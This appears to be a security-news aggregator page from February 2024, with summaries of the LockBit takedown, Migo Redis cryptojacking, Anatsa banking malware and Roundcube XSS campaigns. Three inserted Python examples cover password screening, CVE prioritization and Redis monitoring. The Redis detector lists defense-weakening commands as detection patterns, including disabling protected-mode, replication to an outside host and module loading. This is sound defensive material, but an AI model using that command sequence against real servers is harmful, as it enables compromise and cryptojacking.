            Analysis of 7 billion emails shows clean links are duping users, malicious EML attachments increased 10-fold in Q4, and social engineering attacks are at all-time highs, according to VIPRE Security. “The rise of the EML file attachments”: In 2024, QR code hacks or quishing will increase, use of AI to create content for spam emails including deepfakes will rise; highly personalized social media mining will grow further; and a wide array of file types and … More

            The post Clean links and sophisticated scams mark new era in email attacks appeared first on Help Net Security.

            "

            Autosummary: Financial services (22%) was the most targeted sector by phishing and malspam emails, followed by information technology (14%), healthcare (14%), education (10%), and government (8%). This shows that attackers are launching malware merely for reconnaissance now, as valuable artifacts like username, computer name, operating system, CPU name, RAM, and IP address may fetch more on the Dark Web than they could garner in a one-off attack. "


            LockBit Ransomware’s Darknet Domains Seized in Global Law Enforcement Raid

            exploits ransomware
            2024-02-20 https://thehackernews.com/2024/02/lockbit-ransomwares-darknet-domains.html
            An international law enforcement operation has led to the seizure of multiple darknet domains operated by LockBit, one of the most prolific ransomware groups, marking the latest in a long list of digital takedowns. While the full extent of the effort, codenamed Operation Cronos, is presently unknown, visiting the group’s .onion website displays a seizure banner containing the message " "

            Autosummary: "


            Messi defends HK absence as backlash continues

            ransomware
            2024-02-20 https://www.bbc.co.uk/news/world-asia-china-68345107
            The football superstar has addressed Chinese fans in a video posted on social media platform Weibo. "

            Autosummary: "


            Raccoon Infostealer operator extradited to the United States

            government
            2024-02-20 https://www.malwarebytes.com/blog/news/2024/02/raccoon-infostealer-operator-extradited-to-the-united-states
            A Ukrainian national that is being accused of operating the Raccoon Infostealer in a Malware-as-a-Service has been extradited to the US. "

            Autosummary: A Ukrainian national, Mark Sokolovsky, has been indicted for crimes related to fraud, money laundering and aggravated identity theft and extradited to the United States from the Netherlands, the US Attorney’s Office of the Western District of Texas has announced. "


            LockBit disrupted by international law enforcement task force

            ransomware
            2024-02-20 https://www.helpnetsecurity.com/2024/02/20/lockbit-law-enforcement-action/

            On Monday afternoon, LockBit’s leak site has been taken over by a coalition of law enforcement agencies and is showing a seizure notice that promises more details today, at 11:30 GMT. “This site is now under the control of The National Crime Agency of the UK, working in close cooperation with the FBI and the international law enforcement task force, ‘Operation Cronos’,” the notice says. “We can confirm that Lockbit’s services have been disrupted as … More

            The post LockBit disrupted by international law enforcement task force appeared first on Help Net Security.

            "

            Autosummary: “According to LockBit admins, the law enforcement agencies exploited PHP CVE-2023-3824 vulnerability to compromise LockBit’s public-facing servers and gain access to LockBit source code, internal chat, victims’ details, and stolen data,” he told Help Net Security. "


            Cactus ransomware gang claims the theft of 1.5TB of data from Energy management and industrial automation firm Schneider Electric

            exploits ransomware industry
            2024-02-20 https://securityaffairs.com/159353/hacking/cactus-ransomware-gang-schneider-electric.html
            The Cactus ransomware gang claims the theft of 1.5TB of data from the Energy management and industrial automation firm Schneider Electric. The Cactus ransomware group claims responsibility for pilfering 1.5TB of data from the Energy management and industrial automation giant Schneider Electric. Schneider Electric is a multinational company that specializes in energy management, industrial automation, […] "

            Autosummary: Pierluigi Paganini, February 20, 2024. The Cactus ransomware gang claims the theft of 1.5TB of data from the Energy management and industrial automation firm Schneider Electric. "


            Critical infrastructure software maker confirms ransomware attack

            exploits ransomware
            2024-02-20 https://www.bleepingcomputer.com/news/security/critical-infrastructure-software-maker-confirms-ransomware-attack/
            PSI Software SE, a German software developer for complex production and logistics processes, has confirmed that the cyber incident it disclosed last week is a ransomware attack that impacted its internal infrastructure. [...] "

            Autosummary: It also provides "control system solutions for operational management, network utilization, pipeline management, leak detection and location, portfolio management, energy trading and sales. "


            Police arrest LockBit ransomware members, release decryptor in global crackdown

            exploits ransomware
            2024-02-20 https://www.bleepingcomputer.com/news/security/police-arrest-lockbit-ransomware-members-release-decryptor-in-global-crackdown/
            Law enforcement arrested two operators of the LockBit ransomware gang in Poland and Ukraine, created a decryption tool to recover encrypted files for free, and seized over 200 crypto-wallets after hacking the cybercrime gang’s servers in an international crackdown operation. [...] "

            Autosummary: "We have source code, details of the victims you have attacked, the amount of money extorted, the data stolen, chats, and much, much more," the message reads. Previous charges against Lockbit ransomware actors include Mikhail Vasiliev (November 2022), Ruslan Magomedovich Astamirov (June 2023), and Mikhail Pavlovich Matveev aka Wazawaka (May 2023). Operation Cronos: The global LockBit crackdown was coordinated by Operation Cronos, a task force headed by the U.K. National Crime Agency (NCA) and coordinated in Europe by Europol and Eurojust. "


            LockBit takedown: Infrastructure disrupted, criminals arrested, decryption keys recovered

            ransomware
            2024-02-20 https://www.helpnetsecurity.com/2024/02/20/lockbit-takedown/

            In the wake of yesterday’s surprise law enforcement takeover of LockBit’s leak site, the UK National Crime Agency (NCA) and Europol have shared more information about the extent of the takedown. “Today, after infiltrating the group’s network, the NCA has taken control of the infrastructure that allows the Lockbit service to operate, compromising their entire criminal enterprise and damaging their credibility,” the Agency said. They’ve taken control of LockBit’s administration environment, which enabled affiliates to … More

            The post LockBit takedown: Infrastructure disrupted, criminals arrested, decryption keys recovered appeared first on Help Net Security.

            "

            Autosummary: The freezing of over 200 cryptocurrency accounts linked to the group; the takedown of 34 servers in the Netherlands, Germany, Finland, France, Switzerland, Australia, the United States and the United Kingdom (either belonging to the LockBit threat actors or to their affiliates). “At present, a vast amount of data gathered throughout the investigation is now in the possession of law enforcement. "


            LockBit Ransomware Operation Shut Down; Criminals Arrested; Decryption Keys Released

            exploits ransomware
            2024-02-20 https://thehackernews.com/2024/02/lockbit-ransomware-operation-shut-down.html
            The U.K. National Crime Agency (NCA) on Tuesday confirmed that it obtained LockBit’s source code as well as intelligence pertaining to its activities and their affiliates as part of a dedicated task force called Operation Cronos. "Some of the data on LockBit’s systems belonged to victims who had paid a ransom to the threat actors, evidencing that even when a ransom is paid, it does not "

            Autosummary: "Some of the data on LockBit’s systems belonged to victims who had paid a ransom to the threat actors, evidencing that even when a ransom is paid, it does not guarantee that data will be deleted, despite what the criminals have promised," the agency said. "


            New Malicious PyPI Packages Caught Using Covert Side-Loading Tactics

            industry
            2024-02-20 https://thehackernews.com/2024/02/new-malicious-pypi-packages-caught.html
            Cybersecurity researchers have discovered two malicious packages on the Python Package Index (PyPI) repository that were found leveraging a technique called DLL side-loading to circumvent detection by security software and run malicious code. The packages, named NP6HelperHttptest and NP6HelperHttper, were each downloaded 537 and 166 times, respectively, "

            Autosummary: "


            SaaS Compliance through the NIST Cybersecurity Framework

            ciber
            2024-02-20 https://thehackernews.com/2024/02/saas-compliance-through-nist.html
            The US National Institute of Standards and Technology (NIST) cybersecurity framework is one of the world’s most important guidelines for securing networks. It can be applied to any number of applications, including SaaS.  One of the challenges facing those tasked with securing SaaS applications is the different settings found in each application. It makes it difficult to develop a "

            Autosummary: In addition to those mentioned here relating to access, password, and data leaks, which are fairly universal, configurations are used for key management, mobile security, operational resilience, phishing protection, SPAM protection, and more. Require Admin MFA: To comply with NIST standards, all admin user accounts should be required to access the application using multi-factor authentication (MFA), such as a one-time password (OTP). Additionally, it would include terms like the user’s name, company products, partners, and other business terms. If your organization doesn’t have a password policy, consider following NIST guidelines: Don’t make mandatory password changes, as users tend to choose easy-to-remember passwords. NIST advocates for a strong and well-managed password policy, which is essential to protect sensitive user data, confidential business information, and proprietary assets stored within the cloud-based infrastructure. "
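The password guidance summarized above (no forced rotation, but screen each candidate against breached passwords and against context-specific words such as the user's name, company products and partners) is what NIST SP 800-63B calls a blocklist check. The following is an added example of such a screen, written for this page and not taken from the article or from NIST; the breached-password set, the context terms and the test passwords are constructed sample data, and the repetition/sequence run length of 4 is this example's own choice.

```python
"""Password screening in the style of NIST SP 800-63B memorized-secret rules.

Added example (not the article's or NIST's code). Checks: length bounds, a
breached/common-password list, repetitive or sequential characters, and
context-specific words (username, company, products, partners). There are
deliberately no composition rules (digits/symbols required) and no expiry.
"""
import re
import unicodedata

MIN_LEN = 8    # 800-63B minimum for user-chosen secrets
MAX_LEN = 64   # verifiers must accept at least 64 characters

# Constructed stand-in for a breached-password corpus (real ones hold millions).
BREACHED = {"password", "password123", "qwerty", "letmein", "welcome1", "123456789"}


def normalize(s):
    """Fold case and accents and drop separators, so 'Acme-Corp!' and
    'acmecorp' compare equal and 'Password123!' still hits the breach list."""
    s = unicodedata.normalize("NFKD", s).encode("ascii", "ignore").decode()
    return re.sub(r"[^a-z0-9]", "", s.lower())


def has_repetition(pw, run=4):
    """True for runs like 'aaaa' (same character `run` times in a row)."""
    return re.search(r"(.)\1{%d,}" % (run - 1), pw) is not None


def has_sequence(pw, run=4):
    """True for runs like 'abcd' or '4321' (consecutive code points, either direction)."""
    codes = [ord(c) for c in pw.lower()]
    for i in range(len(codes) - run + 1):
        window = codes[i:i + run]
        diffs = {b - a for a, b in zip(window, window[1:])}
        if diffs == {1} or diffs == {-1}:
            return True
    return False


def check_password(pw, username, context_terms):
    """Return the list of reasons the password is rejected; empty means accepted."""
    reasons = []
    if len(pw) < MIN_LEN:
        reasons.append(f"shorter than {MIN_LEN} characters")
    if len(pw) > MAX_LEN:
        reasons.append(f"longer than {MAX_LEN} characters")
    norm = normalize(pw)
    if norm in BREACHED:
        reasons.append("appears in breached/common password list")
    if has_repetition(pw):
        reasons.append("repetitive characters")
    if has_sequence(pw):
        reasons.append("sequential characters")
    # Context-specific words: the user's own name plus business terms.
    for term in [username, *context_terms]:
        t = normalize(term)
        if len(t) >= 3 and t in norm:   # skip very short terms to avoid noise
            reasons.append(f"contains context-specific word '{term}'")
    return reasons


if __name__ == "__main__":
    # Constructed examples: company and product names are placeholders.
    ctx = ["Acme", "Widgetron"]
    for pw in ["correct horse battery staple", "Password123!", "AcmeCorp2024", "aaaa1234", "short"]:
        print(repr(pw), "->", check_password(pw, "alice", ctx) or "accepted")
```

Note that the screen is applied at enrollment and password change only; 800-63B explicitly advises against periodic forced changes, which is why there is no expiry logic here.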


            Knight ransomware source code for sale after leak site shuts down

            exploits ransomware
            2024-02-20 https://www.bleepingcomputer.com/news/security/knight-ransomware-source-code-for-sale-after-leak-site-shuts-down/
            The alleged source code for the third iteration of the Knight ransomware is being offered for sale to a single buyer on a hacker forum by a representative of the operation. [...] "

            Autosummary: [Image: Sale post on the RAMP forums (KELA)] “Selling the source code for Knight 3.0 ransomware, this will include the source code of the panel and the locker, all source code is owned and written in Glong C++,” says Cyclops in the post. "


            Ransomware Groups, Targeting Preferences, and the Access Economy

            exploits
            2024-02-20 https://www.bleepingcomputer.com/news/security/ransomware-groups-targeting-preferences-and-the-access-economy/
            The cybercrime ecosystem has created a supply chain of stolen accounts and breached networks that are used to fuel ransomware attacks and data breaches. Learn more from Flare about how this supply chain has led to an explosion of cybercrime. [...] "

            Autosummary: The past three years have seen the explosive growth of infostealers, a type of malware that steals all browser credentials, cookies, cryptocurrency wallet information, and other sensitive data from a single host, exports it to C2 infrastructure, then self terminates on the machine. This access is then sold to other actors on three major dark web forums: Exploit, XSS, and RAMP, in an auction style format, or sold privately via direct messages in existing relationships. The Initial Access Broker Ecosystem: Initial access brokers are highly specialized threat actors who focus on carrying out the initial stages of an attack, gaining initial access to a corporate IT environment, and establishing persistence. "


            Law enforcement trolls LockBit, reveals massive takedown

            ransomware
            2024-02-20 https://www.malwarebytes.com/blog/business/2024/02/law-enforcement-trolls-lockbit-reveals-massive-takedown
            Law enforcement has humiliated the humiliators. "

            Autosummary: As well as taking over the leak site, law enforcement agencies have taken over LockBit’s administration environment, seized the infrastructure used by LockBit’s data exfiltration tool, Stealbit, captured over 1,000 decryption keys, and frozen 200 cryptocurrency accounts. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. The identity of Lockbitsupp won’t be a mystery for much longer: The NCA could have put the information about the takedown anywhere, but it didn’t; it did something memorable, humorous, and deliberately humiliating with it. "


            ManageEngine unveils ML-powered exploit triad analytics feature

            exploits industry
            2024-02-20 https://www.helpnetsecurity.com/2024/02/20/manageengine-log360-siem-solution/

            ManageEngine released an ML-powered exploit triad analytics feature in its SIEM solution, Log360. Now, enterprises can knowledgeably trace the path of adversaries and mitigate breaches by providing complete contextual visibility into the exploit triad: users, entities and processes. Addressing the critical need for faster breach response: “Today’s cyberthreats masterfully blend into the fabric of legitimate activity, weaponizing stolen credentials, mimicking trusted processes and exploiting human vulnerabilities. These insidious tactics create a critical challenge: an extended … More

            The post ManageEngine unveils ML-powered exploit triad analytics feature appeared first on Help Net Security.

            "

            Autosummary: Highlights of ML-powered exploit triad analytics: Log360’s threat detection and incident response (TDIR) module, Vigil IQ, features a dual-layered threat detection system released last year. "


            New Migo Malware Targeting Redis Servers for Cryptocurrency Mining

            exploits
            2024-02-20 https://thehackernews.com/2024/02/new-migo-malware-targeting-redis.html
            A novel malware campaign has been observed targeting Redis servers for initial access with the ultimate goal of mining cryptocurrency on compromised Linux hosts. "This particular campaign involves the use of a number of novel system weakening techniques against the data store itself," Cado security researcher Matt Muir said in a technical report. The cryptojacking attack is facilitated "

            Autosummary: The cloud security company said it detected the campaign after it identified an "unusual series of commands" targeting its Redis honeypots; the commands are engineered to lower security defenses by disabling a set of configuration options. It’s suspected that these options are turned off in order to send additional commands to the Redis server from external networks and facilitate future exploitation without attracting much attention. "


            More details about Operation Cronos that disrupted Lockbit operation

            ransomware
            2024-02-20 https://securityaffairs.com/159388/cyber-crime/operation-cronos-against-lockbit.html
            Law enforcement provided additional details about the international Operation Cronos that led to the disruption of the Lockbit ransomware operation. Yesterday, a joint law enforcement action, code-named Operation Cronos, conducted by law enforcement agencies from 11 countries disrupted the LockBit ransomware operation. Below is the image of the Tor leak site of the Lockbit ransomware gang that […] "

            Autosummary: Since January 2020, affiliates utilizing LockBit have targeted organizations of diverse sizes spanning critical infrastructure sectors such as financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. “The Justice Department also unsealed an indictment obtained in the District of New Jersey charging Russian nationals Artur Sungatov and Ivan Kondratyev, also known as Bassterlord, with deploying LockBit against numerous victims throughout the United States, including businesses nationwide in the manufacturing and other industries, as well as victims around the world in the semiconductor and other industries. It shows that no criminal operation, wherever they are, and no matter how advanced, is beyond the reach of the Agency and our partners,” said National Crime Agency Director General, Graeme Biggar. "


            New Migo malware disables protection features on Redis servers

            exploits
            2024-02-20 https://www.bleepingcomputer.com/news/security/new-migo-malware-disables-protection-features-on-redis-servers/
            Security researchers discovered a new campaign that targets Redis servers on Linux hosts using a piece of malware called "Migo" to mine for cryptocurrency. [...] "

            Autosummary: Redis (Remote Dictionary Server) is an in-memory data structure store used as a database, cache, and message broker known for its high performance, serving thousands of requests per second for real-time applications in industries like gaming, technology, financial services, and healthcare. "
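Both Migo entries above describe the same precursor: a client issuing an unusual series of commands that switch off Redis' own protections before the real payload arrives. That sequence is visible in `redis-cli MONITOR` output or a honeypot's command log, so it can be flagged before the miner is dropped. The following is an added example written for this page, not Cado's or Migo's code: a small detector over MONITOR-format lines. The watchlist of directives and commands is this example's own assumption about what "lowering security defenses" looks like (the report as quoted does not reproduce Migo's exact option list), and the log lines are constructed.

```python
"""Flag Redis commands that weaken the server's own defenses.

Added example (not Cado's or Migo's code) over lines in `redis-cli MONITOR`
format, e.g.

    1708387200.101 [0 203.0.113.10:51234] "CONFIG" "SET" "protected-mode" "no"

The watchlist below is an assumption, not Migo's documented option list.
"""
import re
import shlex
from collections import Counter
from dataclasses import dataclass

MONITOR_RE = re.compile(
    r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<args>.*)$'
)

# Assumed watchlist: directives whose change disables a protection or lets a
# remote client decide where the database file is written.
RISKY_DIRECTIVES = {
    "protected-mode",                 # off = unauthenticated remote clients allowed
    "replica-read-only",              # off = a replica accepts writes
    "aof-rewrite-incremental-fsync",  # fsync behaviour during AOF rewrite
    "rdb-save-incremental-fsync",     # fsync behaviour during RDB save
    "dir", "dbfilename",              # classic write-a-file-anywhere primitive
}


@dataclass
class Finding:
    ts: str
    client: str
    reason: str
    command: str


def parse_monitor_line(line):
    """Return (timestamp, client, argv) for a MONITOR line, else None."""
    m = MONITOR_RE.match(line.strip())
    if m is None:
        return None
    # MONITOR quotes every argument; shlex undoes the quoting and escapes.
    return m.group("ts"), m.group("client"), shlex.split(m.group("args"))


def classify(argv):
    """Return a reason string if argv is a defense-weakening command, else None."""
    if not argv:
        return None
    cmd = argv[0].upper()
    if cmd == "CONFIG" and len(argv) >= 3 and argv[1].upper() == "SET":
        directive = argv[2].lower()
        if directive in RISKY_DIRECTIVES:
            return f"CONFIG SET of protection-relevant directive {directive}"
    if cmd in ("SLAVEOF", "REPLICAOF") and len(argv) >= 3 and argv[1].upper() != "NO":
        # Pointing replication at an attacker-controlled host is the usual
        # prelude to pulling in a rogue module; "SLAVEOF NO ONE" only stops it.
        return f"replication pointed at {argv[1]}:{argv[2]}"
    if cmd == "MODULE" and len(argv) >= 2 and argv[1].upper() == "LOAD":
        return "module loaded from disk"
    return None


def scan(lines):
    """Run classify() over MONITOR output and collect findings in log order."""
    findings = []
    for line in lines:
        parsed = parse_monitor_line(line)
        if parsed is None:
            continue
        ts, client, argv = parsed
        reason = classify(argv)
        if reason:
            findings.append(Finding(ts, client, reason, " ".join(argv)))
    return findings


def by_client(findings):
    """Count risky commands per source; a burst from one client is the signal."""
    return dict(Counter(f.client for f in findings))


# Constructed sample: one benign internal client, one external client
# weakening the server step by step.
SAMPLE_LOG = [
    "OK",
    '1708387200.101 [0 203.0.113.10:51234] "CONFIG" "SET" "protected-mode" "no"',
    '1708387200.205 [0 203.0.113.10:51234] "CONFIG" "SET" "replica-read-only" "no"',
    '1708387201.010 [0 10.0.0.5:40001] "GET" "session:42"',
    '1708387201.220 [0 10.0.0.5:40001] "CONFIG" "GET" "dir"',
    '1708387202.330 [0 203.0.113.10:51234] "SLAVEOF" "198.51.100.7" "6379"',
    '1708387203.000 [0 10.0.0.5:40001] "SLAVEOF" "NO" "ONE"',
]

if __name__ == "__main__":
    findings = scan(SAMPLE_LOG)
    for f in findings:
        print(f.ts, f.client, f.reason, "<-", f.command)
    print(by_client(findings))
```

Feed it with `redis-cli MONITOR | python3 detector.py`-style piping in practice (MONITOR is expensive on busy instances, so prefer a honeypot or a short sampling window). The grouping by client matters more than any single hit: a lone `CONFIG SET dir` from an admin host is routine, three protection changes from one external address in two seconds is not.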


            CVE Prioritizer: Open-source tool to prioritize vulnerability patching

            exploits
            2024-02-19 https://www.helpnetsecurity.com/2024/02/19/cve-prioritizer-open-source-vulnerability-patching/

            CVE Prioritizer is an open-source tool designed to assist in prioritizing the patching of vulnerabilities. It integrates data from CVSS, EPSS, and CISA’s KEV catalog to offer insights into the probability of exploitation and the potential effects of vulnerabilities on your systems. How CVE Prioritizer works: The tool leverages the correlation between CVSS and EPSS scores to improve efforts in fixing vulnerabilities. CVSS provides essential details about a vulnerability’s characteristics, whereas EPSS supplies information based … More

            The post CVE Prioritizer: Open-source tool to prioritize vulnerability patching appeared first on Help Net Security.

            "

            Autosummary: It allows security teams to make informed decisions based on their unique contexts,” Mario Rojas, the creator of CVE Prioritizer, told Help Net Security. "
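The entry above explains the idea (CVSS for impact, EPSS for likelihood, KEV as ground truth of exploitation) without showing how the three combine. The following is an added example of that combination, written for this page; it is not CVE Prioritizer's own code, and its tiers and cut-offs (CVSS 7.0, EPSS 0.2) are this example's assumptions rather than the tool's. The CVE identifiers and scores in SAMPLE are constructed placeholders, not real entries.

```python
"""Rank vulnerabilities by combining CVSS severity, EPSS exploitation
probability and CISA KEV membership.

Added example, not the CVE Prioritizer tool's code or thresholds. The tiers
and cut-offs are assumptions; SAMPLE holds constructed placeholder CVEs.
"""
from dataclasses import dataclass

CVSS_HIGH = 7.0   # assumed: "High" or worse on the CVSS v3 scale
EPSS_HIGH = 0.2   # assumed: 20% predicted chance of exploitation within 30 days

# Lower number sorts first.
TIER_ORDER = {"P1+": 0, "P1": 1, "P2": 2, "P3": 3, "P4": 4}


@dataclass(frozen=True)
class Vuln:
    cve: str
    cvss: float   # base score, 0.0-10.0
    epss: float   # probability, 0.0-1.0
    in_kev: bool  # listed in CISA's Known Exploited Vulnerabilities catalog


def priority(v):
    """Map one vulnerability to a tier.

    P1+  in KEV: exploitation is confirmed, scores are irrelevant
    P1   severe and likely to be exploited
    P2   likely to be exploited even though severity is moderate
    P3   severe but no sign of exploitation yet
    P4   everything else: normal patch cadence
    """
    if not (0.0 <= v.cvss <= 10.0) or not (0.0 <= v.epss <= 1.0):
        raise ValueError(f"{v.cve}: score out of range")
    if v.in_kev:
        return "P1+"
    severe = v.cvss >= CVSS_HIGH
    likely = v.epss >= EPSS_HIGH
    if severe and likely:
        return "P1"
    if likely:
        return "P2"
    if severe:
        return "P3"
    return "P4"


def rank(vulns):
    """Order by tier, then EPSS descending, then CVSS descending."""
    return sorted(vulns, key=lambda v: (TIER_ORDER[priority(v)], -v.epss, -v.cvss))


def tier_counts(vulns):
    """How many vulnerabilities land in each tier (useful for a backlog summary)."""
    counts = {}
    for v in vulns:
        t = priority(v)
        counts[t] = counts.get(t, 0) + 1
    return counts


SAMPLE = [  # constructed placeholders, not real CVEs
    Vuln("CVE-0000-0001", 9.8, 0.04, False),   # critical score, low EPSS  -> P3
    Vuln("CVE-0000-0002", 5.3, 0.85, False),   # medium score, high EPSS   -> P2
    Vuln("CVE-0000-0003", 8.8, 0.62, False),   # high on both              -> P1
    Vuln("CVE-0000-0004", 7.5, 0.01, True),    # in KEV                    -> P1+
    Vuln("CVE-0000-0005", 3.1, 0.002, False),  # low on both               -> P4
]

if __name__ == "__main__":
    for v in rank(SAMPLE):
        print(f"{priority(v):4} {v.cve} cvss={v.cvss} epss={v.epss:.3f} kev={v.in_kev}")
```

The point the sample makes is the one the article makes: a 9.8 with an EPSS of 4% sorts below a 5.3 with an EPSS of 85%, because the first has severe potential and the second has evidence of attacker interest. Raise or lower the two cut-offs to match your own risk appetite; a KEV entry should always win regardless.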


            Fraudsters have found creative ways to scam some businesses

            financial
            2024-02-19 https://www.helpnetsecurity.com/2024/02/19/2024-fraudulent-activity/

            70% of businesses report that fraud losses have increased in recent years and over half of consumers feel they’re more of a fraud target than a year ago, according to Experian. To thwart fraudulent activity in 2024, businesses need to deploy more sophisticated fraud protection solutions that harness the power of data and technology to mitigate risk and protect consumers. Experian suggests consumers and businesses watch out for these five fraud threats in 2024: Generative … More

            The post Fraudsters have found creative ways to scam some businesses appeared first on Help Net Security.

            "

            Autosummary: Fraudsters expand into cause-related and investment deception: From fake GoFundMe campaigns, social media giveaways, investment opportunities and text fraud, fraudsters are employing new methods that strike an emotional response from consumers with cause-related asks or too-good-to-be-real offers to gain access to consumers’ vital, personal information. Experian predicts fraudsters will use generative AI to accelerate “do-it-yourself” fraud with a wide range of deepfake content, such as emails, voice and video as well as code creation to set up scam websites and perpetuate online attacks. "


            Russian-Linked Hackers Breach 80+ Organizations via Roundcube Flaws

            rusia-ucrania
            2024-02-19 https://thehackernews.com/2024/02/russian-linked-hackers-breach-80.html
            Threat actors operating with interests aligned to Belarus and Russia have been linked to a new cyber espionage campaign that likely exploited cross-site scripting (XSS) vulnerabilities in Roundcube webmail servers to target over 80 organizations. These entities are primarily located in Georgia, Poland, and Ukraine, according to Recorded Future, which attributed the intrusion set to a threat "

            Autosummary: "


            Iranian Hackers Target Middle East Policy Experts with New BASICSTAR Backdoor

            industry
            2024-02-19 https://thehackernews.com/2024/02/iranian-hackers-target-middle-east.html
            The Iranian-origin threat actor known as Charming Kitten has been linked to a new set of attacks aimed at Middle East policy experts with a new backdoor called BASICSTAR by creating a fake webinar portal. Charming Kitten, also called APT35, CharmingCypress, Mint Sandstorm, TA453, and Yellow Garuda, has a history of orchestrating a wide range of social engineering campaigns that cast a "

            Autosummary: Charming Kitten, also called APT35, CharmingCypress, Mint Sandstorm, TA453, and Yellow Garuda, has a history of orchestrating a wide range of social engineering campaigns that cast a wide net in their targeting, often singling out think tanks, NGOs, and journalists. "


            Anatsa Android malware downloaded 150,000 times via Google Play

            exploits
            2024-02-19 https://www.bleepingcomputer.com/news/security/anatsa-android-malware-downloaded-150-000-times-via-google-play/
            The Anatsa banking trojan has been targeting users in Europe by infecting Android devices through malware droppers hosted on Google Play. [...] "

            Autosummary: The five malicious apps are:
            Phone Cleaner - File Explorer (com.volabs.androidcleaner)
            PDF Viewer - File Explorer (com.xolab.fileexplorer)
            PDF Reader - Viewer & Editor (com.jumbodub.fileexplorerpdfviewer)
            Phone Cleaner: File Explorer (com.appiclouds.phonecleaner)
            PDF Reader: File Manager (com.tragisoap.fileandpdfmanager)
            Considering that Anatsa constantly launches new attack waves using fresh dropper apps, the total number of downloads is expected to further increase. Over the past four months, security researchers noticed five campaigns tailored to deliver the malware to users in the UK, Germany, Spain, Slovakia, Slovenia, and the Czech Republic. "


            Anatsa Android Trojan Bypasses Google Play Security, Expands Reach to New Countries

            exploits
            2024-02-19 https://thehackernews.com/2024/02/anatsa-android-trojan-bypasses-google.html
            The Android banking trojan known as Anatsa has expanded its focus to include Slovakia, Slovenia, and Czechia as part of a new campaign observed in November 2023. "Some of the droppers in the campaign successfully exploited the accessibility service, despite Google Play"s enhanced detection and protection mechanisms," ThreatFabric said in a report shared with The Hacker News. "

            Autosummary: In June 2023, the Dutch mobile security firm disclosed an Anatsa campaign that targeted banking customers in the U.S., the U.K., Germany, Austria, and Switzerland at least since March 2023 using dropper apps that were collectively downloaded over 30,000 times on the Play Store. "


            Russia-linked APT TAG-70 targets European government and military mail servers exploiting Roundcube XSS

            exploits government
            2024-02-19 https://securityaffairs.com/159311/apt/russia-apt-tag-70-roundcube-xss.html
            An APT group, tracked as TAG-70, linked to Belarus and Russia exploited XSS flaws in Roundcube webmail servers to target over 80 organizations. Researchers from Recorded Future’s Insikt Group identified a cyberespionage campaign carried out by an APT group, tracked as TAG-70, linked to Belarus and Russia. The nation-state actors are known to carry out […] "

            Autosummary: Pierluigi Paganini, February 19, 2024. An APT group, tracked as TAG-70, linked to Belarus and Russia exploited XSS flaws in Roundcube webmail servers to target over 80 organizations. "


            How BRICS Got “Rug Pulled” – Cryptocurrency Counterfeiting is on the Rise

            industry
            2024-02-19 https://securityaffairs.com/159318/cyber-crime/resecurity-warns-cryptocurrency-counterfeiting.html
            Resecurity has identified an increasing trend of cryptocurrency counterfeiting, the experts found several tokens impersonating major brands, government organizations and national fiat currencies. Resecurity has identified an increasing trend of cryptocurrency counterfeiting. Ongoing brand protection for Fortune 100 companies by cybersecurity company uncovered several tokens impersonating major brands, government organizations and even national fiat currencies. […] "

            Autosummary: A notable example of this deceptive practice is the emergence of a counterfeit token named ‘BRICS’ recently detected by Resecurity, which exploited the focus on the investment interest and potential expansion of the BRICS intergovernmental organization, comprising countries like Brazil, Russia, India, China, South Africa, Egypt, Ethiopia, Iran, and the United Arab Emirates. "


            Alert as torrential rains hit Bolivia, killing dozens

            latam
            2024-02-19 https://www.bbc.co.uk/news/world-latin-america-68338020
            Officials say 85% of all Bolivia’s municipalities are now under alert due to heavy rains. "

            Autosummary: "


            Hackers exploit critical RCE flaw in Bricks WordPress site builder

            exploits
            2024-02-19 https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-rce-flaw-in-bricks-wordpress-site-builder/
            Hackers are actively exploiting a critical remote code execution (RCE) flaw impacting the Brick Builder Theme to run malicious PHP code on vulnerable sites. [...] "

            Autosummary: The following IP addresses have been associated with most of the attacks:
            200.251.23.57
            92.118.170.216
            103.187.5.128
            149.202.55.79
            5.252.118.211
            91.108.240.52
            Wordfence also confirmed the active exploitation status of CVE-2024-25600, and reported seeing 24 detections in the past day. "


            LockBit ransomware disrupted by global police operation

            exploits ransomware
            2024-02-19 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-disrupted-by-global-police-operation/
            Law enforcement agencies from 11 countries have disrupted the notorious LockBit ransomware operation in a joint operation known as "Operation Cronos." [...] "

            Autosummary: We have source code, details of the victims you have attacked, the amount of money extorted, the data stolen, chats, and much, much more," the message displayed on the LockBit panel reads. "


            Cactus ransomware claim to steal 1.5TB of Schneider Electric data

            exploits ransomware
            2024-02-19 https://www.bleepingcomputer.com/news/security/cactus-ransomware-claim-to-steal-15tb-of-schneider-electric-data/
            The Cactus ransomware gang claims they stole 1.5TB of data from Schneider Electric after breaching the company’s network last month. [...] "

            Autosummary: "


            Over 28,500 Exchange servers vulnerable to actively exploited bug

            exploits
            2024-02-19 https://www.bleepingcomputer.com/news/security/over-28-500-exchange-servers-vulnerable-to-actively-exploited-bug/
            Up to 97,000 Microsoft Exchange servers may be vulnerable to a critical severity privilege escalation flaw tracked as CVE-2024-21410 that hackers are actively exploiting. [...] "

            Autosummary: "


            Anatsa Android banking Trojan expands to Slovakia, Slovenia, and Czechia

            financial exploits
            2024-02-19 https://securityaffairs.com/159344/malware/anatsa-banking-trojan-resurgence.html
            The Android banking trojan Anatsa resurged expanding its operation to new countries, including Slovakia, Slovenia, and Czechia. In November 2023, researchers from ThreatFabric observed a resurgence of the Anatsa banking Trojan, aka TeaBot and Toddler. Between November and February, the experts observed five distinct waves of attacks, each focusing on different regions. The malware previously focused […] "

            Autosummary: Pierluigi Paganini, February 19, 2024. The Android banking trojan Anatsa resurged expanding its operation to new countries, including Slovakia, Slovenia, and Czechia. "


            Operation Cronos: law enforcement disrupted the LockBit operation

            ransomware
            2024-02-19 https://securityaffairs.com/159360/cyber-crime/operation-cronos-disrupted-lockbit-operation.html
            An international law enforcement operation codenamed ‘Operation Cronos’ led to the disruption of the LockBit ransomware operation. A joint law enforcement action, code-named Operation Cronos, conducted by law enforcement agencies from 11 countries has disrupted the LockBit ransomware operation. Below is the image of the Tor leak site of the Lockbit ransomware gang that was […] "

            Autosummary: Since January 2020, affiliates utilizing LockBit have targeted organizations of diverse sizes spanning critical infrastructure sectors such as financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. "


